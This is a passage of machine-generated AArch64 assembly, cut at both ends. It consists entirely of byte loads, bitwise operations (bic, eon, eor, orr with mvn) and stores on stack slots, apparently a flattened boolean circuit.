w8, w8, w9 strb w8, [sp, #1211] ldrb w9, [sp, #517] ldrb w8, [sp, #1045] bic w8, w8, w9 strb w8, [sp, #1042] ldrb w8, [sp, #1140] ldrb w9, [sp, #673] bic w8, w8, w9 strb w8, [sp, #329] ldrb w9, [sp, #1225] ldrb w8, [sp, #1220] bic w8, w8, w9 strb w8, [sp, #1221] ldrb w8, [sp, #612] ldrb w9, [sp, #1224] bic w8, w8, w9 strb w8, [sp, #956] ldrb w9, [sp, #1213] ldrb w8, [sp, #960] bic w8, w8, w9 strb w8, [sp, #957] ldrb w8, [sp, #728] ldrb w9, [sp, #595] bic w8, w8, w9 strb w8, [sp, #646] ldrb w9, [sp, #183] ldrb w8, [sp, #1148] bic w8, w8, w9 strb w8, [sp, #1149] ldrb w8, [sp, #396] ldrb w9, [sp, #185] bic w8, w8, w9 strb w8, [sp, #1133] ldrb w9, [sp, #1125] ldrb w8, [sp, #1130] bic w8, w8, w9 strb w8, [sp, #1129] ldrb w8, [sp, #32] ldrb w9, [sp, #1126] bic w8, w8, w9 strb w8, [sp, #735] ldrb w9, [sp, #606] ldrb w8, [sp, #603] bic w8, w8, w9 strb w8, [sp, #602] ldrb w8, [sp, #274] ldrb w9, [sp, #607] bic w8, w8, w9 strb w8, [sp, #268] ldrb w9, [sp, #915] ldrb w8, [sp, #912] bic w8, w8, w9 strb w8, [sp, #911] ldrb w8, [sp, #916] ldrb w9, [sp, #911] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1064] ldrb w8, [sp, #10] ldrb w9, [sp, #911] bic w8, w8, w9 strb w8, [sp, #719] ldrb w8, [sp, #1038] ldrb w9, [sp, #11] eon w8, w8, w9 strb w8, [sp, #764] ldrb w8, [sp, #1038] ldrb w9, [sp, #11] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #541] ldrb w8, [sp, #141] ldrb w9, [sp, #11] bic w8, w8, w9 strb w8, [sp, #739] ldrb w8, [sp, #1003] ldrb w9, [sp, #124] eor w8, w8, w9 strb w8, [sp, #70] ldrb w8, [sp, #1003] ldrb w9, [sp, #124] bic w8, w8, w9 strb w8, [sp, #1062] ldrb w8, [sp, #1004] ldrb w9, [sp, #124] bic w8, w8, w9 strb w8, [sp, #795] ldrb w8, [sp, #1161] ldrb w9, [sp, #260] eon w8, w8, w9 strb w8, [sp, #259] ldrb w8, [sp, #1161] ldrb w9, [sp, #260] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #81] ldrb w8, [sp, #420] ldrb w9, [sp, #260] bic w8, w8, w9 strb w8, [sp, #82] ldrb w8, [sp, #173] ldrb w9, [sp, #86] eon w8, w8, w9 strb w8, [sp, #449] ldrb w8, [sp, #173] ldrb w9, [sp, #86] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #974] ldrb w8, [sp, #305] ldrb w9, [sp, #86] bic w8, w8, w9 strb w8, [sp, #979] ldrb w8, [sp, #107] ldrb w9, [sp, #963] eon w8, w8, w9 strb w8, [sp, #961] ldrb w8, [sp, #107] ldrb w9, [sp, #963] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1207] ldrb w8, [sp, #834] ldrb w9, [sp, #963] bic w8, w8, w9 strb w8, [sp, #1206] ldrb w8, [sp, #673] ldrb w9, [sp, #1042] eon w8, w8, w9 strb w8, [sp, #475] ldrb w8, [sp, #673] ldrb w9, [sp, #1042] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #866] ldrb w8, [sp, #1140] ldrb w9, [sp, #1042] bic w8, w8, w9 strb w8, [sp, #876] ldrb w8, [sp, #1224] ldrb w9, [sp, #1221] eon w8, w8, w9 strb w8, [sp, #1218] ldrb w8, [sp, #1224] ldrb w9, [sp, #1221] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #121] ldrb w8, [sp, #612] ldrb w9, [sp, #1221] bic w8, w8, w9 strb w8, [sp, #695] ldrb w8, [sp, #595] ldrb w9, [sp, #957] eon w8, w8, w9 strb w8, [sp, #958] ldrb w8, [sp, #595] ldrb w9, [sp, #957] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #640] ldrb w8, [sp, #728] ldrb w9, [sp, #957] bic w8, w8, w9 strb w8, [sp, #648] ldrb w8, [sp, #185] ldrb w9, [sp, #1149] eon w8, w8, w9 strb w8, [sp, #649] ldrb w8, [sp, #185] ldrb w9, [sp, #1149] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #223] ldrb w8, [sp, #396] ldrb w9, [sp, #1149] bic w8, w8, w9 strb w8, [sp, #1134] ldrb w8, [sp, #1126] ldrb w9, [sp, #1129] eon w8, w8, w9 strb w8, [sp, #1132] ldrb w8, [sp, #1126] ldrb w9, [sp, #1129] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #692] ldrb w8, [sp, #32] ldrb w9, [sp, #1129] bic w8, w8, w9 strb w8, [sp, #736] ldrb w8, [sp, #607] ldrb w9, [sp, #602] eon w8, w8, w9 strb w8, [sp, #601] ldrb w8, [sp, #607] ldrb w9, [sp, #602] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #500] ldrb w8, [sp, #274] ldrb w9, [sp, #602] bic w8, w8, w9 strb w8, [sp, #265] ldrb w8, [sp, #916] ldrb w9, [sp, #911] eon w8, w8, w9 strb w8, [sp, #579] ldrb w8, [sp, #420] ldrb w9, [sp, #259] eon w8, w8, w9 strb w8, [sp, #1204] ldrb w8, [sp, #1081] ldrb w9, [sp, #1064] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #675] ldrb w8, [sp, #141] ldrb w9, [sp, #764] eor w8, w8, w9 strb w8, [sp, #635] ldrb w8, [sp, #538] ldrb w9, [sp, #541] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #753] ldrb w8, [sp, #1004] ldrb w9, [sp, #70] eor w8, w8, w9 strb w8, [sp, #558] ldrb w8, [sp, #831] ldrb w9, [sp, #1062] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #264] ldrb w8, [sp, #82] ldrb w9, [sp, #81] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #80] ldrb w8, [sp, #305] ldrb w9, [sp, #449] eor w8, w8, w9 strb w8, [sp, #84] ldrb w8, [sp, #979] ldrb w9, [sp, #974] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #308] ldrb w8, [sp, #834] ldrb w9, [sp, #961] eor w8, w8, w9 strb w8, [sp, #955] ldrb w8, [sp, #1206] ldrb w9, [sp, #1207] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #299] ldrb w8, [sp, #1140] ldrb w9, [sp, #475] eor w8, w8, w9 strb w8, [sp, #1209] ldrb w8, [sp, #876] ldrb w9, [sp, #866] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #865] ldrb w8, [sp, #612] ldrb w9, [sp, #1218] eor w8, w8, w9 strb w8, [sp, #1219] ldrb w8, [sp, #695] ldrb w9, [sp, #121] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #749] ldrb w8, [sp, #728] ldrb w9, [sp, #958] eor w8, w8, w9 strb w8, [sp, #879] ldrb w8, [sp, #648] ldrb w9, [sp, #640] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #644] ldrb w8, [sp, #396] ldrb w9, [sp, #649] eor w8, w8, w9 strb w8, [sp, #651] ldrb w8, [sp, #1133] ldrb w9, [sp, #223] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #224] ldrb w8, [sp, #32] ldrb w9, [sp, #1132] eor w8, w8, w9 strb w8, [sp, #1131] ldrb w8, [sp, #735] ldrb w9, [sp, #692] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #688] ldrb w8, [sp, #274] ldrb w9, [sp, #601] eor w8, w8, w9 strb w8, [sp, #600] ldrb w8, [sp, #268] ldrb w9, [sp, #500] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #508] ldrb w8, [sp, #10] ldrb w9, [sp, #579] eor w8, w8, w9 strb w8, [sp, #278] ldrb w8, [sp, #1238] ldrb w9, [sp, #278] bic w8, w8, w9 strb w8, [sp, #680] ldrb w9, [sp, #719] ldrb w8, [sp, #675] bic w8, w8, w9 strb w8, [sp, #676] ldrb w8, [sp, #148] ldrb w9, [sp, #635] bic w8, w8, w9 strb w8, [sp, #190] ldrb w9, [sp, #739] ldrb w8, [sp, #753] bic w8, w8, w9 strb w8, [sp, #1065] ldrb w8, [sp, #104] ldrb w9, [sp, #558] bic w8, w8, w9 strb w8, [sp, #1057] ldrb w9, [sp, #795] ldrb w8, [sp, #264] bic w8, w8, w9 strb w8, [sp, #1027] ldrb w9, [sp, #83] ldrb w8, [sp, #80] bic w8, w8, w9 strb w8, [sp, #79] ldrb w8, [sp, #625] ldrb w9, [sp, #84] bic w8, w8, w9 strb w8, [sp, #962] ldrb w9, [sp, #697] ldrb w8, [sp, #308] bic w8, w8, w9 strb w8, [sp, #964] ldrb w8, [sp, #627] ldrb w9, [sp, #955] bic w8, w8, w9 strb w8, [sp, #453] ldrb w9, [sp, #1211] ldrb w8, [sp, #299] bic w8, w8, w9 strb w8, [sp, #298] ldrb w8, [sp, #1145] ldrb w9, [sp, #1209] bic w8, w8, w9 strb w8, [sp, #302] ldrb w9, [sp, #329] ldrb w8, [sp, #865] bic w8, w8, w9 strb w8, [sp, #868] ldrb w8, [sp, #613] ldrb w9, [sp, #1219] bic w8, w8, w9 strb w8, [sp, #512] ldrb w9, [sp, #956] ldrb w8, [sp, #749] bic w8, w8, w9 strb w8, [sp, #287] ldrb w8, [sp, #725] ldrb w9, [sp, #879] bic w8, w8, w9 strb w8, [sp, #1026] ldrb w9, [sp, #646] ldrb w8, [sp, #644] bic w8, w8, w9 strb w8, [sp, #628] ldrb w8, [sp, #382] ldrb w9, [sp, #651] bic w8, w8, w9 strb w8, [sp, #229] ldrb w9, [sp, #1134] ldrb w8, [sp, #224] bic w8, w8, w9 strb w8, [sp, #161] ldrb w8, [sp, #29] ldrb w9, [sp, #1131] bic w8, w8, w9 strb w8, [sp, #713] ldrb w9, [sp, #736] ldrb w8, [sp, #688] bic w8, w8, w9 strb w8, [sp, #696] ldrb w8, [sp, #270] ldrb w9, [sp, #600] bic w8, w8, w9 strb w8, [sp, #665] ldrb w9, [sp, #265] ldrb w8, [sp, #508] bic w8, w8, w9 strb w8, [sp, #250] ldrb w8, [sp, #278] ldrb w9, [sp, #250] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1217] ldrb w8, [sp, #1238] ldrb w9, [sp, #250] bic w8, w8, w9 strb w8, [sp, #679] ldrb w8, [sp, #635] ldrb w9, [sp, #676] eon w8, w8, w9 strb w8, [sp, #1200] ldrb w8, [sp, #635] ldrb w9, [sp, #676] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #863] ldrb w8, [sp, #148] ldrb w9, [sp, #676] bic w8, w8, w9 strb w8, [sp, #193] ldrb w8, [sp, #104] ldrb w9, [sp, #1065] eor w8, w8, w9 strb w8, [sp, #188] ldrb w8, [sp, #104] ldrb w9, [sp, #1065] bic w8, w8, w9 strb w8, [sp, #77] ldrb w8, [sp, #558] ldrb w9, [sp, #1065] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #87] ldrb w8, [sp, #487] ldrb w9, [sp, #1027] eor w8, w8, w9 strb w8, [sp, #92] ldrb w8, [sp, #487] ldrb w9, [sp, #1027] bic w8, w8, w9 strb w8, [sp, #365] ldrb w8, [sp, #485] ldrb w9, [sp, #1027] bic w8, w8, w9 strb w8, [sp, #1018] ldrb w8, [sp, #84] ldrb w9, [sp, #79] eon w8, w8, w9 strb w8, [sp, #414] ldrb w8, [sp, #84] ldrb w9, [sp, #79] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #760] ldrb w8, [sp, #625] ldrb w9, [sp, #79] bic w8, w8, w9 strb w8, [sp, #631] ldrb w8, [sp, #955] ldrb w9, [sp, #964] eon w8, w8, w9 strb w8, [sp, #632] ldrb w8, [sp, #955] ldrb w9, [sp, #964] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #448] ldrb w8, [sp, #627] ldrb w9, [sp, #964] bic w8, w8, w9 strb w8, [sp, #452] ldrb w8, [sp, #1209] ldrb w9, [sp, #298] eon w8, w8, w9 strb w8, [sp, #458] ldrb w8, [sp, #1209] ldrb w9, [sp, #298] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #871] ldrb w8, [sp, #1145] ldrb w9, [sp, #298] bic w8, w8, w9 strb w8, [sp, #872] ldrb w8, [sp, #1219] ldrb w9, [sp, #868] eon w8, w8, w9 strb w8, [sp, #867] ldrb w8, [sp, #1219] ldrb w9, [sp, #868] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #344] ldrb w8, [sp, #613] ldrb w9, [sp, #868] bic w8, w8, w9 strb w8, [sp, #505] ldrb w8, [sp, #879] ldrb w9, [sp, #287] eon w8, w8, w9 strb w8, [sp, #559] ldrb w8, [sp, #879] ldrb w9, [sp, #287] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1032] ldrb w8, [sp, #725] ldrb w9, [sp, #287] bic w8, w8, w9 strb w8, [sp, #311] ldrb w8, [sp, #651] ldrb w9, [sp, #628] eon w8, w8, w9 strb w8, [sp, #634] ldrb w8, [sp, #651] ldrb w9, [sp, #628] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #230] ldrb w8, [sp, #382] ldrb w9, [sp, #628] bic w8, w8, w9 strb w8, [sp, #232] ldrb w8, [sp, #1131] ldrb w9, [sp, #161] eon w8, w8, w9 strb w8, [sp, #234] ldrb w8, [sp, #1131] ldrb w9, [sp, #161] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #89] ldrb w8, [sp, #29] ldrb w9, [sp, #161] bic w8, w8, w9 strb w8, [sp, #698] ldrb w8, [sp, #600] ldrb w9, [sp, #696] eon w8, w8, w9 strb w8, [sp, #694] ldrb w8, [sp, #600] ldrb w9, [sp, #696] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #944] ldrb w8, [sp, #270] ldrb w9, [sp, #696] bic w8, w8, w9 strb w8, [sp, #341] ldrb w8, [sp, #278] ldrb w9, [sp, #250] eon w8, w8, w9 strb w8, [sp, #489] ldrb w8, [sp, #625] ldrb w9, [sp, #414] eon w8, w8, w9 strb w8, [sp, #1023] ldrb w8, [sp, #680] ldrb w9, [sp, #1217] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1239] ldrb w8, [sp, #148] ldrb w9, [sp, #1200] eor w8, w8, w9 strb w8, [sp, #678] ldrb w8, [sp, #190] ldrb w9, [sp, #863] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #853] ldrb w8, [sp, #558] ldrb w9, [sp, #188] eon w8, w8, w9 strb w8, [sp, #184] ldrb w8, [sp, #1057] ldrb w9, [sp, #77] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1059] ldrb w8, [sp, #485] ldrb w9, [sp, #92] eor w8, w8, w9 strb w8, [sp, #90] ldrb w8, [sp, #277] ldrb w9, [sp, #365] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #366] ldrb w8, [sp, #631] ldrb w9, [sp, #760] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #629] ldrb w8, [sp, #627] ldrb w9, [sp, #632] eor w8, w8, w9 strb w8, [sp, #633] ldrb w8, [sp, #452] ldrb w9, [sp, #448] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #446] ldrb w8, [sp, #1145] ldrb w9, [sp, #458] eor w8, w8, w9 strb w8, [sp, #456] ldrb w8, [sp, #872] ldrb w9, [sp, #871] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #799] ldrb w8, [sp, #613] ldrb w9, [sp, #867] eor w8, w8, w9 strb w8, [sp, #306] ldrb w8, [sp, #505] ldrb w9, [sp, #344] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #623] ldrb w8, [sp, #725] ldrb w9, [sp, #559] eor w8, w8, w9 strb w8, [sp, #518] ldrb w8, [sp, #311] ldrb w9, [sp, #1032] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #335] ldrb w8, [sp, #382] ldrb w9, [sp, #634] eor w8, w8, w9 strb w8, [sp, #785] ldrb w8, [sp, #229] ldrb w9, [sp, #230] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1055] ldrb w8, [sp, #29] ldrb w9, [sp, #234] eor w8, w8, w9 strb w8, [sp, #1118] ldrb w8, [sp, #713] ldrb w9, [sp, #89] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #172] ldrb w8, [sp, #270] ldrb w9, [sp, #694] eor w8, w8, w9 strb w8, [sp, #1108] ldrb w8, [sp, #665] ldrb w9, [sp, #944] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #837] ldrb w8, [sp, #1238] ldrb w9, [sp, #489] eor w8, w8, w9 strb w8, [sp, #261] ldrb w8, [sp, #828] ldrb w9, [sp, #261] bic w8, w8, w9 strb w8, [sp, #639] ldrb w9, [sp, #679] ldrb w8, [sp, #1239] bic w8, w8, w9 strb w8, [sp, #78] ldrb w8, [sp, #465] ldrb w9, [sp, #678] bic w8, w8, w9 strb w8, [sp, #902] ldrb w9, [sp, #193] ldrb w8, [sp, #853] bic w8, w8, w9 strb w8, [sp, #182] ldrb w8, [sp, #1001] ldrb w9, [sp, #184] bic w8, w8, w9 strb w8, [sp, #1114] ldrb w9, [sp, #87] ldrb w8, [sp, #1059] bic w8, w8, w9 strb w8, [sp, #1151] ldrb w8, [sp, #484] ldrb w9, [sp, #90] bic w8, w8, w9 strb w8, [sp, #360] ldrb w9, [sp, #1018] ldrb w8, [sp, #366] bic w8, w8, w9 strb w8, [sp, #181] ldrb w9, [sp, #962] ldrb w8, [sp, #629] bic w8, w8, w9 strb w8, [sp, #578] ldrb w8, [sp, #626] ldrb w9, [sp, #633] bic w8, w8, w9 strb w8, [sp, #111] ldrb w9, [sp, #453] ldrb w8, [sp, #446] bic w8, w8, w9 strb w8, [sp, #597] ldrb w8, [sp, #1146] ldrb w9, [sp, #456] bic w8, w8, w9 strb w8, [sp, #808] ldrb w9, [sp, #302] ldrb w8, [sp, #799] bic w8, w8, w9 strb w8, [sp, #818] ldrb w8, [sp, #614] ldrb w9, [sp, #306] bic w8, w8, w9 strb w8, [sp, #413] ldrb w9, [sp, #512] ldrb w8, [sp, #623] bic w8, w8, w9 strb w8, [sp, #171] ldrb w8, [sp, #726] ldrb w9, [sp, #518] bic w8, w8, w9 strb w8, [sp, #1060] ldrb w9, [sp, #1026] ldrb w8, [sp, #335] bic w8, w8, w9 strb w8, [sp, #319] ldrb w8, [sp, #383] ldrb w9, [sp, #785] bic w8, w8, w9 strb w8, [sp, #838] ldrb w9, [sp, #232] ldrb w8, [sp, #1055] bic w8, w8, w9 strb w8, [sp, #139] ldrb w8, [sp, #30] ldrb w9, [sp, #1118] bic w8, w8, w9 strb w8, [sp, #1111] ldrb w9, [sp, #698] ldrb w8, [sp, #172] bic w8, w8, w9 strb w8, [sp, #266] ldrb w8, [sp, #269] ldrb w9, [sp, #1108] bic w8, w8, w9 strb w8, [sp, #883] ldrb w9, [sp, #341] ldrb w8, [sp, #837] bic w8, w8, w9 strb w8, [sp, #922] ldrb w8, [sp, #261] ldrb w9, [sp, #922] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #638] ldrb w8, [sp, #828] ldrb w9, [sp, #922] bic w8, w8, w9 strb w8, [sp, #117] ldrb w8, [sp, #678] ldrb w9, [sp, #78] eon w8, w8, w9 strb w8, [sp, #683] ldrb w8, [sp, #678] ldrb w9, [sp, #78] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #884] ldrb w8, [sp, #465] ldrb w9, [sp, #78] bic w8, w8, w9 strb w8, [sp, #1079] ldrb w8, [sp, #184] ldrb w9, [sp, #182] eon w8, w8, w9 strb w8, [sp, #179] ldrb w8, [sp, #184] ldrb w9, [sp, #182] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #858] ldrb w8, [sp, #1001] ldrb w9, [sp, #182] bic w8, w8, w9 strb w8, [sp, #835] ldrb w8, [sp, #90] ldrb w9, [sp, #1151] eon w8, w8, w9 strb w8, [sp, #143] ldrb w8, [sp, #90] ldrb w9, [sp, #1151] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #811] ldrb w8, [sp, #484] ldrb w9, [sp, #1151] bic w8, w8, w9 strb w8, [sp, #359] ldrb w8, [sp, #702] ldrb w9, [sp, #181] eor w8, w8, w9 strb w8, [sp, #1006] ldrb w8, [sp, #702] ldrb w9, [sp, #181] bic w8, w8, w9 strb w8, [sp, #159] ldrb w8, [sp, #703] ldrb w9, [sp, #181] bic w8, w8, w9 strb w8, [sp, #163] ldrb w8, [sp, #633] ldrb w9, [sp, #578] eon w8, w8, w9 strb w8, [sp, #1017] ldrb w8, [sp, #633] ldrb w9, [sp, #578] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #88] ldrb w8, [sp, #626] ldrb w9, [sp, #578] bic w8, w8, w9 strb w8, [sp, #397] ldrb w8, [sp, #456] ldrb w9, [sp, #597] eon w8, w8, w9 strb w8, [sp, #689] ldrb w8, [sp, #456] ldrb w9, [sp, #597] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #316] ldrb w8, [sp, #1146] ldrb w9, [sp, #597] bic w8, w8, w9 strb w8, [sp, #221] ldrb w8, [sp, #306] ldrb w9, [sp, #818] eon w8, w8, w9 strb w8, [sp, #377] ldrb w8, [sp, #306] ldrb w9, [sp, #818] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1007] ldrb w8, [sp, #614] ldrb w9, [sp, #818] bic w8, w8, w9 strb w8, [sp, #66] ldrb w8, [sp, #518] ldrb w9, [sp, #171] eon w8, w8, w9 strb w8, [sp, #584] ldrb w8, [sp, #518] ldrb w9, [sp, #171] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1008] ldrb w8, [sp, #726] ldrb w9, [sp, #171] bic w8, w8, w9 strb w8, [sp, #1058] ldrb w8, [sp, #785] ldrb w9, [sp, #319] eon w8, w8, w9 strb w8, [sp, #1054] ldrb w8, [sp, #785] ldrb w9, [sp, #319] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #69] ldrb w8, [sp, #383] ldrb w9, [sp, #319] bic w8, w8, w9 strb w8, [sp, #71] ldrb w8, [sp, #1118] ldrb w9, [sp, #139] eon w8, w8, w9 strb w8, [sp, #715] ldrb w8, [sp, #1118] ldrb w9, [sp, #139] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #654] ldrb w8, [sp, #30] ldrb w9, [sp, #139] bic w8, w8, w9 strb w8, [sp, #690] ldrb w8, [sp, #1108] ldrb w9, [sp, #266] eon w8, w8, w9 strb w8, [sp, #333] ldrb w8, [sp, #1108] ldrb w9, [sp, #266] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #687] ldrb w8, [sp, #269] ldrb w9, [sp, #266] bic w8, w8, w9 strb w8, [sp, #901] ldrb w8, [sp, #261] ldrb w9, [sp, #922] eon w8, w8, w9 strb w8, [sp, #561] ldrb w8, [sp, #626] ldrb w9, [sp, #1017] eon w8, w8, w9 strb w8, [sp, #864] ldrb w8, [sp, #639] ldrb w9, [sp, #638] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #93] ldrb w8, [sp, #465] ldrb w9, [sp, #683] eor w8, w8, w9 strb w8, [sp, #637] ldrb w8, [sp, #902] ldrb w9, [sp, #884] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #286] ldrb w8, [sp, #1001] ldrb w9, [sp, #179] eor w8, w8, w9 strb w8, [sp, #875] ldrb w8, [sp, #1114] ldrb w9, [sp, #858] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #859] ldrb w8, [sp, #484] ldrb w9, [sp, #143] eor w8, w8, w9 strb w8, [sp, #169] ldrb w8, [sp, #360] ldrb w9, [sp, #811] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1201] ldrb w8, [sp, #703] ldrb w9, [sp, #1006] eor w8, w8, w9 strb w8, [sp, #361] ldrb w8, [sp, #231] ldrb w9, [sp, #159] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #699] ldrb w8, [sp, #397] ldrb w9, [sp, #88] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #425] ldrb w8, [sp, #1146] ldrb w9, [sp, #689] eor w8, w8, w9 strb w8, [sp, #138] ldrb w8, [sp, #221] ldrb w9, [sp, #316] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #398] ldrb w8, [sp, #614] ldrb w9, [sp, #377] eor w8, w8, w9 strb w8, [sp, #380] ldrb w8, [sp, #66] ldrb w9, [sp, #1007] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1106] ldrb w8, [sp, #726] ldrb w9, [sp, #584] eor w8, w8, w9 strb w8, [sp, #279] ldrb w8, [sp, #1058] ldrb w9, [sp, #1008] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #454] ldrb w8, [sp, #383] ldrb w9, [sp, #1054] eor w8, w8, w9 strb w8, [sp, #498] ldrb w8, [sp, #838] ldrb w9, [sp, #69] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #836] ldrb w8, [sp, #30] ldrb w9, [sp, #715] eor w8, w8, w9 strb w8, [sp, #1013] ldrb w8, [sp, #1111] ldrb w9, [sp, #654] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #324] ldrb w8, [sp, #269] ldrb w9, [sp, #333] eor w8, w8, w9 strb w8, [sp, #338] ldrb w8, [sp, #883] ldrb w9, [sp, #687] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #851] ldrb w8, [sp, #828] ldrb w9, [sp, #561] eor w8, w8, w9 strb w8, [sp, #856] ldrb w8, [sp, #827] ldrb w9, [sp, #856] bic w8, w8, w9 strb w8, [sp, #1164] ldrb w9, [sp, #117] ldrb w8, [sp, #93] bic w8, w8, w9 strb w8, [sp, #653] ldrb w8, [sp, #466] ldrb w9, [sp, #637] bic w8, w8, w9 strb w8, [sp, #509] ldrb w9, [sp, #1079] ldrb w8, [sp, #286] bic w8, w8, w9 strb w8, [sp, #284] ldrb w8, [sp, #995] ldrb w9, [sp, #875] bic w8, w8, w9 strb w8, [sp, #986] ldrb w9, [sp, #835] ldrb w8, [sp, #859] bic w8, w8, w9 strb w8, [sp, #852] ldrb w8, [sp, #483] ldrb w9, [sp, #169] bic w8, w8, w9 strb w8, [sp, #655] ldrb w9, [sp, #359] ldrb w8, [sp, #1201] bic w8, w8, w9 strb w8, [sp, #921] ldrb w8, [sp, #362] ldrb w9, [sp, #361] bic w8, w8, w9 strb w8, [sp, #598] ldrb w9, [sp, #163] ldrb w8, [sp, #699] bic w8, w8, w9 strb w8, [sp, #168] ldrb w9, [sp, #111] ldrb w8, [sp, #425] bic w8, w8, w9 strb w8, [sp, #1109] ldrb w8, [sp, #337] ldrb w9, [sp, #138] bic w8, w8, w9 strb w8, [sp, #336] ldrb w9, [sp, #808] ldrb w8, [sp, #398] bic w8, w8, w9 strb w8, [sp, #1022] ldrb w8, [sp, #615] ldrb w9, [sp, #380] bic w8, w8, w9 strb w8, [sp, #388] ldrb w9, [sp, #413] ldrb w8, [sp, #1106] bic w8, w8, w9 strb w8, [sp, #385] ldrb w8, [sp, #731] ldrb w9, [sp, #279] bic w8, w8, w9 strb w8, [sp, #1016] ldrb w9, [sp, #1060] ldrb w8, [sp, #454] bic w8, w8, w9 strb w8, [sp, #1012] ldrb w8, [sp, #732] ldrb w9, [sp, #498] bic w8, w8, w9 strb w8, [sp, #1210] ldrb w9, [sp, #71] ldrb w8, [sp, #836] bic w8, w8, w9 strb w8, [sp, #611] ldrb w8, [sp, #35] ldrb w9, [sp, #1013] bic w8, w8, w9 strb w8, [sp, #217] ldrb w9, [sp, #690] ldrb w8, [sp, #324] bic w8, w8, w9 strb w8, [sp, #317] ldrb w8, [sp, #271] ldrb w9, [sp, #338] bic w8, w8, w9 strb w8, [sp, #720] ldrb w9, [sp, #901] ldrb w8, [sp, #851] bic w8, w8, w9 strb w8, [sp, #684] ldrb w8, [sp, #856] ldrb w9, [sp, #684] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #492] ldrb w8, [sp, #827] ldrb w9, [sp, #684] bic w8, w8, w9 strb w8, [sp, #920] ldrb w8, [sp, #637] ldrb w9, [sp, #653] eon w8, w8, w9 strb w8, [sp, #553] ldrb w8, [sp, #637] ldrb w9, [sp, #653] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #510] ldrb w8, [sp, #466] ldrb w9, [sp, #653] bic w8, w8, w9 strb w8, [sp, #928] ldrb w8, [sp, #875] ldrb w9, [sp, #284] eon w8, w8, w9 strb w8, [sp, #997] ldrb w8, [sp, #875] ldrb w9, [sp, #284] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #1229] ldrb w8, [sp, #995] ldrb w9, [sp, #284] bic w8, w8, w9 strb w8, [sp, #322] ldrb w8, [sp, #169] ldrb w9, [sp, #852] eon w8, w8, w9 strb w8, [sp, #855] ldrb w8, [sp, #169] ldrb w9, [sp, #852] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #899] ldrb w8, [sp, #483] ldrb w9, [sp, #852] bic w8, w8, w9 strb w8, [sp, #691] ldrb w8, [sp, #362] ldrb w9, [sp, #921] eor w8, w8, w9 strb w8, [sp, #1230] ldrb w8, [sp, #362] ldrb w9, [sp, #921] bic w8, w8, w9 strb w8, [sp, #930] ldrb w8, [sp, #361] ldrb w9, [sp, #921] orr w8, w8, w9 mvn w8, w8 strb w8, [sp, #125] ldrb w8, [sp, #233] ldrb w9, [sp, #168] eor w8, w8, w9 strb w8, [sp, #650] ldrb w8, [sp, #233] ldrb w9, [sp, #168] 